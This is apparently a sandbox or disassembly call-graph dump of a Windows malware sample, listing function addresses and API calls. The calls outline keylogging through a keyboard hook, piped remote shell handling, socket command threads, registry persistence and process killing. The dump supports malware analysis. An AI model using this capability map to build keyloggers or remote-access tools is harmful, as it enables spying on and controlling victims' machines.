VirtualFree 9224->10326 9226 4026c3 9227 4033f3 3 API calls 9226->9227 9238 40b149 9237->9238 9239 40b14f 9237->9239 10329 401a1e 9238->10329 10333 405955 GetProcessHeap RtlAllocateHeap 9239->10333 9242 40b168 10334 401e8e CreateThread 9242->10334 9244 40b18b 9244->8775 9246 404a3d 26 API calls 9245->9246 9247 402503 9246->9247 9247->8775 9249 402511 9248->9249 9250 402538 9248->9250 9251 4033f3 3 API calls 9249->9251 9250->8765 9252 40251d ShellExecuteW 9251->9252 10346 4058fb VirtualFree 9252->10346 9255 4056c3 3 API calls 9254->9255 9256 402556 9255->9256 9257 40331a 11 API calls 9256->9257 9258 40255d 9257->9258 10347 40ce17 9258->10347 9262 40256d 10351 4058fb VirtualFree 9262->10351 9264 402575 9264->8775 9266 404a3d 26 API calls 9265->9266 9267 4027f9 9266->9267 10402 410934 9267->10402 9271 4056c3 3 API calls 9270->9271 9272 402598 9271->9272 9273 40331a 11 API calls 9272->9273 9274 40259f inet_addr 9273->9274 10406 4058fb VirtualFree 9274->10406 9276 4025b1 10407 4058fb VirtualFree 9276->10407 9278 4025b9 10408 411252 9278->10408 9282 40f020 9281->9282 10416 40ea1c RegDeleteKeyW 9282->10416 9284 40f036 9285 40f04a 9284->9285 9286 40f03d TerminateThread 9284->9286 9287 40f08c 9285->9287 9288 40eb4b 5 API calls 9285->9288 9286->9285 9289 40f098 GetModuleFileNameA 9287->9289 9290 40f066 9288->9290 9298 40f0ca 9289->9298 9291 4033f3 3 API calls 9290->9291 9292 40f072 9291->9292 10417 40ea37 9292->10417 9296 40f085 9297 40ea99 RegCloseKey 9296->9297 9297->9287 9299 40f11e CreateProcessA CloseHandle CloseHandle ExitProcess 9298->9299 9366 4010ad GetProcessHeap RtlAllocateHeap 9300->9366 9302 40f5dd CreateFileA GetFileSize ReadFile CloseHandle 9302->8846 9304 4033ab 4 API calls 9303->9304 9305 402b61 9304->9305 9306 40d780 GetCurrentProcess 9305->9306 9367 40e721 GetModuleHandleA GetProcAddress 9306->9367 9310 40d58c GetProcAddress 9309->9310 9312 402b72 9309->9312 9311 40d5a0 9310->9311 9310->9312 9311->9312 9313 40d7e0 9312->9313 9314 40d806 9313->9314 9315 40d880 9313->9315 9316 4033ab 4 API calls 9314->9316 9318 402c65 2 API calls 9315->9318 9317 40d813 RegOpenKeyExW 9316->9317 9369 4058fb VirtualFree 9317->9369 9320 40d894 9318->9320 9322 402dff 2 API calls 9320->9322 9366->9302 9368 402b66 9367->9368 9368->8853 9464 40ddc0 CreateMutexA 9438->9464 9440 40dd3f 9441 4031fd 3 API calls 9440->9441 9442 40dd4b 9441->9442 9465 4058fb VirtualFree 9442->9465 9444 402767 9444->8875 9445->8878 9454 40dd1c 9453->9454 9454->8883 9456 40dcee 9455->9456 9457 40dcde GetFileSize 9455->9457 9456->8884 9457->9456 9464->9440 9465->9444 9470 40e7f3 TerminateProcess CloseHandle 9469->9470 9471 40e80b 9469->9471 9470->8900 9471->8900 9473 40e78f Process32FirstW 9472->9473 9475 40e7c0 9472->9475 9474 40e79f 9473->9474 9476 40e7b9 CloseHandle 9474->9476 9477 40e7a7 Process32NextW 9474->9477 9478 40e7ca CloseHandle 9474->9478 9475->8906 9476->9475 9477->9474 9479 4033ab 4 API calls 9478->9479 9479->9475 9481 4033f3 3 API calls 9480->9481 9482 403eef 9481->9482 9488 4058fb VirtualFree 9482->9488 9484 402959 9484->8909 9488->9484 9510 4058fb VirtualFree 9490->9510 9492 40da4a 9492->8917 9494 4033f3 3 API calls 9493->9494 9495 403730 9494->9495 9511 4058fb VirtualFree 9495->9511 9497 4029b7 9503 4033f3 3 API calls 9502->9503 9504 403be2 9503->9504 9513 4058fb VirtualFree 9504->9513 9506 4029e3 9506->8929 9510->9492 9511->9497 9513->9506 9516 401269 9515->9516 9517 401256 9515->9517 9521 407167 9516->9521 9530 4059a9 GetProcessHeap HeapAlloc 9517->9530 9519 40125e 9519->9516 9531 4071e8 9519->9531 9522 405878 VirtualAlloc 9521->9522 9523 40717e 9522->9523 9524 4031fd 3 API calls 9523->9524 9525 407195 9524->9525 9538 40dd97 WaitForSingleObject 9525->9538 9527 4071ae CreateThread 9539 401dfe 9527->9539 9544 406e11 9527->9544 9530->9519 9536 4059a9 GetProcessHeap HeapAlloc 9531->9536 9533 407203 9537 40ddc0 CreateMutexA 9533->9537 9535 407217 9535->9516 9536->9533 9537->9535 9538->9527 9540 401e12 9539->9540 9541 401e3e ReleaseMutex 9539->9541 9543 4059a9 GetProcessHeap HeapAlloc 9540->9543 9541->8942 9543->9541 9545 4033f3 3 API calls 9544->9545 9546 406e37 9545->9546 9585 4072de 9546->9585 9646 4059a9 GetProcessHeap HeapAlloc 9585->9646 9587 4072fc 9588 40d9f6 CreateMutexA 9587->9588 9589 407323 9588->9589 9646->9587 9702 401815 9665->9702 9668 40db2c 9669 401301 12 API calls 9668->9669 9670 40db37 9669->9670 9672 40db44 9670->9672 9673 401a75 VirtualFree 9670->9673 9671 4033ab 4 API calls 9679 40da8c 9671->9679 9719 4058fb VirtualFree 9672->9719 9673->9672 9675 4031fd 3 API calls 9675->9679 9676 40db4c 9676->8947 9678 4033f3 3 API calls 9678->9679 9679->9668 9679->9671 9679->9675 9679->9678 9705 4058fb VirtualFree 9679->9705 9706 401716 9679->9706 9718 4058fb VirtualFree 9679->9718 9682 40db16 FindNextFileW 9682->9679 9684 401815 2 API calls 9683->9684 9687 40131c 9684->9687 9685 40133f 9687->9685 9688 401716 6 API calls 9687->9688 9723 401862 9687->9723 9688->9687 9720 4059a9 GetProcessHeap HeapAlloc 9702->9720 9704 40183e FindFirstFileW 9704->9679 9705->9679 9707 40172d 9706->9707 9708 4017d7 9706->9708 9721 4059a9 GetProcessHeap HeapAlloc 9707->9721 9710 4031fd 3 API calls 9708->9710 9711 4017f1 9710->9711 9722 4058fb VirtualFree 9711->9722 9713 40180e 9713->9679 9714 4017c5 9714->9708 9716 401a75 VirtualFree 9714->9716 9715 401756 9715->9714 9717 4031fd 3 API calls 9715->9717 9716->9708 9717->9715 9718->9682 9719->9676 9720->9704 9721->9715 9722->9713 9770 4059a9 GetProcessHeap HeapAlloc 9729->9770 9731 40db6b 9771 401996 9731->9771 9734 40dbb5 9736 40dc2b 9734->9736 9739 4033ab 4 API calls 9734->9739 9742 4031fd 3 API calls 9734->9742 9749 403027 lstrlenW 9734->9749 9775 4058fb VirtualFree 9734->9775 9776 4018a3 9734->9776 9788 4058fb VirtualFree 9734->9788 9735 40db98 9774 4059a9 GetProcessHeap HeapAlloc 9735->9774 9740 401348 12 API calls 9736->9740 9738 40dbab GetLogicalDriveStringsW 9738->9734 9739->9734 9741 40dc39 9740->9741 9743 40dc46 9741->9743 9744 401aa0 VirtualFree 9741->9744 9742->9734 9743->8960 9744->9743 9746 40dbd9 GetDriveTypeW 9747 4033f3 3 API calls 9746->9747 9747->9734 9749->9734 9752 401996 2 API calls 9751->9752 9755 401363 9752->9755 9753 401386 9757 4040c9 9753->9757 9755->9753 9756 4018a3 6 API calls 9755->9756 9792 4019e3 9755->9792 9756->9755 9758 401348 12 API calls 9757->9758 9759 4040e1 9758->9759 9770->9731 9789 4059a9 GetProcessHeap HeapAlloc 9771->9789 9773 4019bf GetLogicalDriveStringsW 9773->9734 9773->9735 9774->9738 9775->9746 9777 4018ba 9776->9777 9785 40195e 9776->9785 9790 4059a9 GetProcessHeap HeapAlloc 9777->9790 9779 4031fd 3 API calls 9780 401978 9779->9780 9791 4058fb VirtualFree 9780->9791 9782 40198f 9782->9734 9783 40194c 9783->9785 9787 401aa0 VirtualFree 9783->9787 9784 4018e3 9784->9783 9786 4031fd 3 API calls 9784->9786 9785->9779 9786->9784 9787->9785 9788->9734 9789->9773 9790->9784 9791->9782 9793 4056f9 3 API calls 9792->9793 9794 4019f9 9793->9794 9795 4033f3 3 API calls 9794->9795 9796 401a09 9795->9796 9796->9755 9799 40e831 9798->9799 9846 401683 9799->9846 9802 40e866 Process32FirstW 9805 40e878 CloseHandle 9802->9805 9806 40e8b9 9802->9806 9803 40e9e8 9804 4012ba 12 API calls 9803->9804 9810 40e9f3 9804->9810 9808 4012ba 12 API calls 9805->9808 9807 4030c5 9 API calls 9806->9807 9809 40e8d7 OpenProcess 9807->9809 9811 40e88a 9808->9811 9822 40e8f4 9809->9822 9812 4013b6 VirtualFree 9810->9812 9816 40e8b4 9810->9816 9814 4013b6 VirtualFree 9811->9814 9811->9816 9812->9810 9813 40e907 GetModuleFileNameExW 9813->9822 9814->9811 9815 4033ab lstrlenW lstrlenW lstrcpyW VirtualAlloc 9815->9822 9816->8973 9817 4058fb VirtualFree 9817->9822 9818 4031fd lstrlenW lstrcpyW VirtualAlloc 9818->9822 9819 40e96b CloseHandle 9819->9822 9820 4033f3 lstrlenW lstrcpyW VirtualAlloc 9820->9822 9822->9813 9822->9815 9822->9817 9822->9818 9822->9819 9822->9820 9823 4013b6 VirtualFree 9822->9823 9849 401560 9822->9849 9824 40e9c8 Process32NextW 9823->9824 9824->9806 9825 40e9e1 CloseHandle 9824->9825 9825->9803 9827 401683 2 API calls 9826->9827 9830 4012d5 9827->9830 9828 4012f8 9832 4041eb 9828->9832 9830->9828 9831 401560 6 API calls 9830->9831 9865 4016d5 9830->9865 9831->9830 9833 4012ba 12 API calls 9832->9833 9835 404203 9833->9835 9834 402ac9 9834->8978 9835->9834 9836 4013b6 VirtualFree 9835->9836 9836->9835 9863 4059a9 GetProcessHeap HeapAlloc 9846->9863 9848 4016ac CreateToolhelp32Snapshot 9848->9802 9848->9803 9850 401577 9849->9850 9862 40163c 9849->9862 9864 4059a9 GetProcessHeap HeapAlloc 9850->9864 9852 4031fd 3 API calls 9853 401663 9852->9853 9854 4031fd 3 API calls 9853->9854 9855 401671 9854->9855 9857 4013b6 VirtualFree 9855->9857 9856 4015a0 9859 401616 9856->9859 9861 4031fd lstrlenW lstrcpyW VirtualAlloc 9856->9861 9858 40167c 9857->9858 9858->9822 9860 4013b6 VirtualFree 9859->9860 9859->9862 9860->9859 9861->9856 9862->9852 9863->9848 9864->9856 9866 4056f9 3 API calls 9865->9866 9867 4016ea 9866->9867 9868 4033f3 3 API calls 9867->9868 9869 401702 9868->9869 9870 4033f3 3 API calls 9869->9870 9871 40170e 9870->9871 9871->9830 9874->8988 9875->8990 9877 40d51c 5 API calls 9876->9877 9878 40cdc0 9877->9878 9879 403230 9 API calls 9878->9879 9880 40cdcd 9879->9880 9881 4033f3 3 API calls 9880->9881 9882 40cdd9 9881->9882 9921 40caf0 9882->9921 9887->8998 9888->9000 9890 40cac9 9889->9890 9891 40ca8a GetCurrentThreadId 9889->9891 9894 40cc81 CloseHandle 9890->9894 9892 40cac2 9891->9892 9893 40ca95 9891->9893 9897 40cc81 CloseHandle 9892->9897 9896 40ca9b SetEvent WaitForSingleObject 9893->9896 9904 40cae9 9893->9904 9895 40cad1 9894->9895 9898 40cc81 CloseHandle 9895->9898 9896->9892 9899 40cab8 TerminateThread 9896->9899 9897->9890 9900 40cad9 9898->9900 9899->9892 9901 40cc81 CloseHandle 9900->9901 9902 40cae1 9901->9902 9904->8996 9906 40290f 9905->9906 9907 4031cd 9905->9907 9912 40ccc5 9906->9912 9908 403138 lstrlenA 9907->9908 9909 4031d4 9908->9909 9994 40590a VirtualAlloc 9909->9994 9911 4031db lstrcpyA 9911->9906 9913 40ccd7 9912->9913 9914 40ccd3 9912->9914 9995 402f25 9913->9995 10002 4058fb VirtualFree 9914->10002 9918 40cd0d 9918->8996 9922 40ca7e 5 API calls 9921->9922 9923 40cb03 CreatePipe 9922->9923 9924 40cb44 GetCurrentProcess GetCurrentProcess DuplicateHandle 9923->9924 9925 40cc3c 9923->9925 9924->9925 9926 40cb6c CreatePipe 9924->9926 9927 40cc81 CloseHandle 9925->9927 9926->9925 9928 40cb88 GetCurrentProcess GetCurrentProcess DuplicateHandle 9926->9928 9929 40cc44 9927->9929 9928->9925 9930 40cba6 GetCurrentProcess GetCurrentProcess DuplicateHandle 9928->9930 9931 40cc81 CloseHandle 9929->9931 9930->9925 9932 40cbc0 9930->9932 9933 40cc4c 9931->9933 9959 40cc81 9932->9959 9994->9911 9996 403185 4 API calls 9995->9996 9997 402f39 9996->9997 10003 402f50 9997->10003 10002->9918 10011->9009 10013 4103b1 10012->10013 10014 410411 CoUninitialize 10013->10014 10014->9012 10015->9015 10016->9019 10043 4059a9 GetProcessHeap HeapAlloc 10017->10043 10019 410609 10044 4059a9 GetProcessHeap HeapAlloc 10019->10044 10021 410633 10023 41063f 10021->10023 10054 40fd7f 10021->10054 10045 410024 CoInitialize CoCreateInstance 10023->10045 10026 410651 10027 41065f 10026->10027 10057 40fe4f CoInitialize CoCreateInstance 10026->10057 10027->9021 10030 410457 10029->10030 10042 4105a9 10029->10042 10031 410486 10030->10031 10032 410180 4 API calls 10030->10032 10030->10042 10033 41048f CoCreateInstance 10031->10033 10031->10042 10032->10031 10034 4104b1 10033->10034 10033->10042 10035 40fc00 CoTaskMemFree 10034->10035 10034->10042 10036 410573 10035->10036 10037 41023f 3 API calls 10036->10037 10038 410587 10037->10038 10039 4056f9 3 API calls 10038->10039 10040 410592 10039->10040 10098 40fced 10040->10098 10042->9016 10043->10019 10044->10021 10046 41017b 10045->10046 10052 410064 10045->10052 10046->10026 10046->10027 10048 4100ab VariantInit 10048->10052 10049 410155 CoUninitialize 10049->10046 10052->10046 10052->10048 10052->10049 10052->10052 10068 4059a9 GetProcessHeap HeapAlloc 10052->10068 10069 4102dc 10052->10069 10074 4023b2 10052->10074 10055 4102dc 2 API calls 10054->10055 10056 40fd90 10055->10056 10056->10023 10058 40fe9b 10057->10058 10059 40ffbf CoUninitialize 10057->10059 10058->10059 10081 410180 10058->10081 10059->10026 10068->10052 10078 405847 GetProcessHeap HeapAlloc 10069->10078 10071 4102e7 10079 405847 GetProcessHeap HeapAlloc 10071->10079 10073 4102f3 10073->10052 10075 4023de 10074->10075 10076 4023c1 10074->10076 10075->10052 10080 4059a9 GetProcessHeap HeapAlloc 10076->10080 10078->10071 10079->10073 10080->10075 10095 40fb5c CoInitialize CoCreateInstance 10081->10095 10083 410192 CoCreateInstance 10084 4101bb 10083->10084 10096 40fbf4 CoUninitialize 10095->10096 10097 40fb90 10095->10097 10096->10083 10097->10096 10101 410678 10098->10101 10104 4058fb VirtualFree 10101->10104 10103 410682 10104->10103 10141 4014d4 10105->10141 10108 40f990 10145 410354 10108->10145 10111 40f984 10111->10108 10113 4105e9 20 API calls 10111->10113 10112 40283d 10122 401273 10112->10122 10113->10108 10114 403185 4 API calls 10119 40f9a4 10114->10119 10115 402e63 10 API calls 10115->10119 10116 4031fd 3 API calls 10116->10119 10117 4056f9 LoadLibraryA GetProcAddress ExitProcess 10117->10119 10118 4033f3 3 API calls 10118->10119 10119->10112 10119->10114 10119->10115 10119->10116 10119->10117 10119->10118 10121 4058fb VirtualFree 10119->10121 10151 4013d3 10119->10151 10121->10119 10123 4014d4 2 API calls 10122->10123 10126 40128e 10123->10126 10124 4012b1 10128 404349 10124->10128 10126->10124 10127 4013d3 6 API calls 10126->10127 10167 401521 10126->10167 10127->10126 10129 401273 12 API calls 10128->10129 10130 404361 10129->10130 10131 402853 10130->10131 10132 401a48 VirtualFree 10130->10132 10131->9029 10132->10131 10163 4059a9 GetProcessHeap HeapAlloc 10141->10163 10143 4014fd 10143->10108 10144 4059a9 GetProcessHeap HeapAlloc 10143->10144 10144->10111 10164 4059a9 GetProcessHeap HeapAlloc 10145->10164 10147 41039d 10147->10119 10148 4056f9 3 API calls 10150 410375 10148->10150 10149 4023b2 2 API calls 10149->10150 10150->10147 10150->10148 10150->10149 10152 4013ea 10151->10152 10160 401494 10151->10160 10165 4059a9 GetProcessHeap HeapAlloc 10152->10165 10154 4031fd 3 API calls 10155 4014b0 10154->10155 10166 4058fb VirtualFree 10155->10166 10157 401413 10159 401482 10157->10159 10161 4031fd 3 API calls 10157->10161 10158 4014cd 10158->10119 10159->10160 10162 401a48 VirtualFree 10159->10162 10160->10154 10161->10157 10162->10160 10163->10143 10164->10150 10165->10157 10166->10158 10168 4056f9 3 API calls 10167->10168 10169 401536 10168->10169 10170 4033f3 3 API calls 10169->10170 10171 401546 10170->10171 10171->10126 10174 401ec1 TerminateThread CloseHandle 10173->10174 10175 401ed3 10173->10175 10174->10175 10175->9064 10176->9067 10177->9069 10179 4033f3 3 API calls 10178->10179 10180 4056d6 10179->10180 10180->9076 10197 405955 GetProcessHeap RtlAllocateHeap 10181->10197 10183 40b4c7 10184 402eeb 4 API calls 10183->10184 10185 40b4dc 10184->10185 10186 402eeb 4 API calls 10185->10186 10187 40b4ef 10186->10187 10198 401e8e CreateThread 10187->10198 10197->10183 10210 4033ab 4 API calls 10209->10210 10211 40bf7e RegOpenKeyExW 10210->10211 10212 40bfa0 10211->10212 10233 40bfd0 10211->10233 10213 4033ab 4 API calls 10212->10213 10214 40bfb1 10213->10214 10216 40eaae 10 API calls 10214->10216 10215 402dff 2 API calls 10217 40bfda 10215->10217 10218 40bfba 10216->10218 10294 4058fb VirtualFree 10217->10294 10293 4058fb VirtualFree 10218->10293 10220 40bfe2 10222 40ea99 RegCloseKey 10220->10222 10224 40bfea 10222->10224 10223 40bfc4 10225 40bff0 10223->10225 10226 40bfc8 10223->10226 10224->9086 10224->9087 10227 402ca1 6 API calls 10225->10227 10228 40ea99 RegCloseKey 10226->10228 10229 40c001 10227->10229 10228->10233 10295 40300e lstrcmpW 10229->10295 10231 40c008 10296 4058fb VirtualFree 10231->10296 10233->10215 10235 40efb8 10234->10235 10236 40efa8 10234->10236 10237 40eaae 10 API calls 10235->10237 10238 4033f3 3 API calls 10236->10238 10239 40efc4 10237->10239 10240 40efb4 10238->10240 10241 402ca1 6 API calls 10239->10241 10251 40efe5 10239->10251 10298 4058fb VirtualFree 10240->10298 10244 40efd4 10241->10244 10242 4033f3 3 API calls 10242->10240 10246 4031fd 3 API calls 10244->10246 10245 40effb 10247 402dff 2 API calls 10245->10247 10251->10242 10269 40d29b GetProcAddress 10268->10269 10270 40c5a1 10268->10270 10269->10270 10270->9093 10271 40d22a LoadLibraryA 10270->10271 10272 40d25c 10271->10272 10273 40d24c GetProcAddress 10271->10273 10272->9099 10273->10272 10293->10223 10294->10220 10295->10231 10296->10233 10298->10245 10313->9193 10314 407376 21 API calls 10313->10314 10315->9202 10317 407376 21 API calls 10315->10317 10316->9204 10318 407376 21 API calls 10316->10318 10319->9216 10321 4032f6 10320->10321 10322 4032eb PathFindExtensionW 10320->10322 10323 4033ab 4 API calls 10321->10323 10322->10321 10324 4026a6 10323->10324 10324->9221 10325->9224 10326->9226 10330 401a40 10329->10330 10331 401a31 10329->10331 10330->9239 10331->10330 10335 40138f 10331->10335 10333->9242 10334->9244 10345 407376 21 API calls 10334->10345 10342 4058fb VirtualFree 10335->10342 10337 40139a 10343 4058fb VirtualFree 10337->10343 10339 4013a6 10344 4058fb VirtualFree 10339->10344 10341 4013b1 10341->10331 10342->10337 10343->10339 10344->10341 10346->9250 10352 40d19d 10347->10352 10349 402565 10350 4058fb VirtualFree 10349->10350 10350->9262 10351->9264 10359 40d191 10352->10359 10355 40d1d8 10362 4010c1 GetProcessHeap HeapFree 10355->10362 10356 40d1b3 lstrcpyA CreateThread 10358 40d1de 10356->10358 10364 40ce39 10356->10364 10358->10349 10363 4010ad GetProcessHeap RtlAllocateHeap 10359->10363 10361 40d19b 10361->10355 10361->10356 10362->10358 10363->10361 10374 40d105 WSAStartup 10364->10374 10367 40ce56 send 10368 40cea6 10367->10368 10369 40ce6c 10367->10369 10380 4010c1 GetProcessHeap HeapFree 10368->10380 10371 40ce99 recv 10369->10371 10371->10368 10373 40ce78 CreateThread 10371->10373 10372 40cead 10373->10371 10381 40ceb6 10373->10381 10375 40d12c socket 10374->10375 10379 40ce4f 10374->10379 10376 40d140 gethostbyname 10375->10376 10375->10379 10377 40102c 10376->10377 10378 40d15b htons connect 10377->10378 10378->10379 10379->10367 10379->10368 10380->10372 10382 40d105 WSAStartup socket gethostbyname htons connect 10381->10382 10383 40cede 10382->10383 10384 40cee9 recv 10383->10384 10393 40cfc1 10383->10393 10384->10393 10405 4058fb VirtualFree 10402->10405 10404 402801 10404->8775 10405->10404 10406->9276 10407->9278 10413 405955 GetProcessHeap RtlAllocateHeap 10408->10413 10410 41125d 10414 401e8e CreateThread 10410->10414 10412 4025c2 10412->8775 10413->10410 10414->10412 10415 407376 21 API calls 10414->10415 10416->9284 10418 40ea3f RegDeleteValueW 10417->10418 10419 40ea50 10417->10419 10418->10419 10420 4058fb VirtualFree 10419->10420 10420->9296 10421->8801 10423 40f216 RegCreateKeyExW 10422->10423 10424 40f22f lstrlenW RegSetValueExW RegCloseKey 10422->10424 10423->10424 10424->8840 10430 4010ad GetProcessHeap RtlAllocateHeap 10425->10430 10427 40f16c VirtualProtect VirtualAlloc GetWindowsDirectoryW lstrlenW 10429 40f1d6 10427->10429 10429->8837 10430->10427 10431->8161 10433 401052 10432->10433 10434 40f7f8 Process32First 10433->10434 10435 40f811 10434->10435 10436 40f83a CloseHandle 10435->10436 10437 40f843 10435->10437 10438 40f828 Process32Next 10435->10438 10436->10437 10437->8175 10438->10435 10444 4010ad GetProcessHeap RtlAllocateHeap 10439->10444 10441 40f723 GetModuleFileNameA 10445 401114 10441->10445 10443 40f73d 6 API calls 10443->8169 10444->10441 10446 40111c 10445->10446 10446->10443 10446->10446 10447->8181 10449 402dff 2 API calls 10448->10449 10450 405678 10449->10450 10461 4058fb VirtualFree 10450->10461 10452 405680 10462 4058fb VirtualFree 10452->10462 10454 40568d 10463 4058fb VirtualFree 10454->10463 10456 405698 10464 4058fb VirtualFree 10456->10464 10458 4056a3 10465 4058fb VirtualFree 10458->10465 10460 4056ae 10461->10452 10462->10454 10463->10456 10464->10458 10465->10460 7670 4074c0 7673 4074d5 7670->7673 7672 4074d1 7674 4074f2 7673->7674 7675 40790b CallNextHookEx 7674->7675 7676 4075ae 7674->7676 7677 40750f GetAsyncKeyState 7674->7677 7675->7672 7678 4075ff 7676->7678 7679 4075b8 7676->7679 7680 407593 wsprintfW 7677->7680 7681 40751c 7677->7681 7683 4077f6 7678->7683 7684 40772a 7678->7684 7712 407608 7678->7712 7713 40795b GetKeyState 7679->7713 7691 40763d 7680->7691 7681->7675 7681->7691 7686 407890 7683->7686 7687 407803 7683->7687 7689 407730 7684->7689 7690 4077e2 GetAsyncKeyState 7684->7690 7685 4075bd GetAsyncKeyState 7714 407949 7685->7714 7695 4078ef GetAsyncKeyState 7686->7695 7699 4078d8 GetAsyncKeyState 7686->7699 7700 4078c1 GetAsyncKeyState 7686->7700 7701 4078a2 GetKeyNameTextW 7686->7701 7693 407805 7687->7693 7694 407879 GetAsyncKeyState 7687->7694 7688 407966 23 API calls 7688->7675 7689->7691 7702 4077c4 GetAsyncKeyState 7689->7702 7703 40779b 7689->7703 7689->7712 7690->7691 7691->7688 7697 407862 GetAsyncKeyState 7693->7697 7698 40780d 7693->7698 7694->7691 7695->7691 7697->7691 7705 407812 7698->7705 7706 40784b GetAsyncKeyState 7698->7706 7699->7695 7700->7699 7701->7691 7702->7691 7703->7701 7707 4077a7 GetAsyncKeyState 7703->7707 7709 407834 GetAsyncKeyState 7705->7709 7710 407817 7705->7710 7706->7691 7707->7691 7708 4075f7 7708->7675 7709->7691 7710->7701 7711 407820 GetAsyncKeyState 7710->7711 7711->7691 7712->7675 7712->7691 7712->7701 7712->7708 7713->7685 7715 4075d4 wsprintfW 7714->7715 7716 407966 7715->7716 7749 401052 7716->7749 7719 4079ac 7751 4033ab lstrlenW 7719->7751 7720 4079ed 7775 4030c5 7720->7775 7723 4079bb 7756 403230 7723->7756 7724 4079fa lstrlenW 7726 407a16 7724->7726 7727 407a4f lstrcpyW 7724->7727 7730 4033ab 4 API calls 7726->7730 7729 407a69 CreateFileW 7727->7729 7732 407a96 lstrlenW WriteFile 7729->7732 7733 407af9 lstrlenW WriteFile CloseHandle 7729->7733 7734 407a24 7730->7734 7770 403027 7732->7770 7773 4058fb VirtualFree 7733->7773 7785 40300e lstrcmpW 7734->7785 7736 4079d4 7740 403230 9 API calls 7736->7740 7739 407a2d 7786 4058fb VirtualFree 7739->7786 7744 4079e0 7740->7744 7741 407ac6 WriteFile lstrlenW WriteFile 7741->7733 7742 407b29 7742->7708 7774 4058fb VirtualFree 7744->7774 7745 407a37 7745->7727 7747 407a43 7745->7747 7747->7729 7748 4079e8 7748->7724 7750 40105a GetForegroundWindow GetWindowTextW 7749->7750 7750->7719 7750->7720 7787 405878 VirtualAlloc 7751->7787 7753 4033c6 lstrlenW 7789 405966 7753->7789 7755 4033e0 lstrcpyW 7755->7723 7757 4033ab 4 API calls 7756->7757 7758 403241 7757->7758 7759 4030fb 5 API calls 7758->7759 7760 403249 7759->7760 7791 4058fb VirtualFree 7760->7791 7762 403251 7763 4030fb 7762->7763 7764 403027 lstrlenW 7763->7764 7765 40310d 7764->7765 7766 403027 lstrlenW 7765->7766 7767 403116 7766->7767 7792 40589c 7767->7792 7771 403035 7770->7771 7772 40302c lstrlenW 7770->7772 7771->7741 7772->7741 7773->7742 7774->7748 7776 4030d1 7775->7776 7777 4030d6 7775->7777 7806 4058fb VirtualFree 7776->7806 7778 4033ab 4 API calls 7777->7778 7780 4030e4 7778->7780 7781 4030fb 5 API calls 7780->7781 7782 4030ec 7781->7782 7805 4058fb VirtualFree 7782->7805 7784 4030f4 7784->7724 7785->7739 7786->7745 7788 405896 7787->7788 7788->7753 7790 405972 7789->7790 7790->7755 7791->7762 7793 4058b2 7792->7793 7794 4058b7 7792->7794 7800 405858 7793->7800 7796 4058c7 7794->7796 7803 40590a VirtualAlloc 7794->7803 7798 403126 lstrcatW 7796->7798 7804 4058fb VirtualFree 7796->7804 7798->7736 7801 405862 7800->7801 7802 405866 VirtualQuery 7800->7802 7801->7794 7802->7794 7803->7796 7804->7798 7805->7784 7806->7777 11812 401cc1 11817 4058fb VirtualFree 11812->11817 11814 401ccc 11818 4058fb VirtualFree 11814->11818 11816 401cd7 11817->11814 11818->11816 11827 401acb 11830 403586 11827->11830 11833 4058fb VirtualFree 11830->11833 11832 401ad3 11833->11832 12880 4085cf 12887 4059a9 GetProcessHeap HeapAlloc 12880->12887 12882 4085de 12883 4085f8 12882->12883 12884 4033f3 3 API calls 12882->12884 12885 4085f1 12884->12885 12886 40dd2b 5 API calls 12885->12886 12886->12883 12887->12882 12893 401bd8 12896 4039db 12893->12896 12897 402dff 2 API calls 12896->12897 12898 4039ec 12897->12898 12901 4058fb VirtualFree 12898->12901 12900 401be0 12901->12900 12910 40b3df 12913 40b2c2 EnterCriticalSection 12910->12913 12914 40b2ff 12913->12914 12915 40b2e5 12913->12915 12917 40b330 12914->12917 12918 4031bb 3 API calls 12914->12918 12929 40b321 LeaveCriticalSection 12914->12929 12916 4031bb 3 API calls 12915->12916 12920 40b2f4 12916->12920 12943 4020d3 12917->12943 12921 40b315 12918->12921 12923 405294 11 API calls 12920->12923 12924 405294 11 API calls 12921->12924 12923->12914 12926 40b31d 12924->12926 12925 40b34a 12928 4020d3 WaitForSingleObject 12925->12928 12926->12917 12926->12929 12927 401eb9 2 API calls 12927->12925 12930 40b357 12928->12930 12942 40b3d6 12929->12942 12931 40b366 12930->12931 12933 401eb9 2 API calls 12930->12933 12946 401e8e CreateThread 12931->12946 12933->12931 12934 40b385 12947 401e8e CreateThread 12934->12947 12936 40b399 LeaveCriticalSection 12937 4020d3 WaitForSingleObject 12936->12937 12938 40b3b5 12937->12938 12939 4020d3 WaitForSingleObject 12938->12939 12940 40b3c2 EnterCriticalSection LeaveCriticalSection 12939->12940 12941 40b46d 6 API calls 12940->12941 12941->12942 12944 4020e3 WaitForSingleObject 12943->12944 12945 4020de 12943->12945 12944->12945 12945->12925 12945->12927 12946->12934 12948 407376 21 API calls 12946->12948 12947->12936 12949 407376 21 API calls 12947->12949 7807 410ff6 7868 402473 7807->7868 7810 402473 VirtualAlloc 7811 411013 7810->7811 7812 402473 VirtualAlloc 7811->7812 7813 41101d 7812->7813 7814 402473 VirtualAlloc 7813->7814 7815 411027 7814->7815 7816 402473 VirtualAlloc 7815->7816 7817 411031 7816->7817 7871 4010ad GetProcessHeap RtlAllocateHeap 7817->7871 7819 411053 7872 4010ad GetProcessHeap RtlAllocateHeap 7819->7872 7821 41105c 7873 4010ad GetProcessHeap RtlAllocateHeap 7821->7873 7823 411065 7874 4010ad GetProcessHeap RtlAllocateHeap 7823->7874 7825 41106e 7875 4010ad GetProcessHeap RtlAllocateHeap 7825->7875 7827 411078 7876 40f373 7827->7876 7830 40f373 GetTickCount 7831 411089 7830->7831 7832 40f373 GetTickCount 7831->7832 7833 411090 7832->7833 7834 40f373 GetTickCount 7833->7834 7835 411098 7834->7835 7836 40f373 GetTickCount 7835->7836 7837 4110a0 7836->7837 7880 403185 lstrlenA 7837->7880 7841 4110b7 7888 4058fb VirtualFree 7841->7888 7843 4110bf 7844 403185 4 API calls 7843->7844 7845 4110c9 7844->7845 7846 40d8cd 5 API calls 7845->7846 7847 4110d4 7846->7847 7889 4058fb VirtualFree 7847->7889 7849 4110dc 7850 403185 4 API calls 7849->7850 7851 4110e6 7850->7851 7852 40d8cd 5 API calls 7851->7852 7853 4110f1 7852->7853 7890 4058fb VirtualFree 7853->7890 7855 4110f9 7856 403185 4 API calls 7855->7856 7857 411105 7856->7857 7858 40d8cd 5 API calls 7857->7858 7859 411110 7858->7859 7891 4058fb VirtualFree 7859->7891 7861 411118 7862 403185 4 API calls 7861->7862 7863 411124 7862->7863 7864 40d8cd 5 API calls 7863->7864 7865 41112f 7864->7865 7892 4058fb VirtualFree 7865->7892 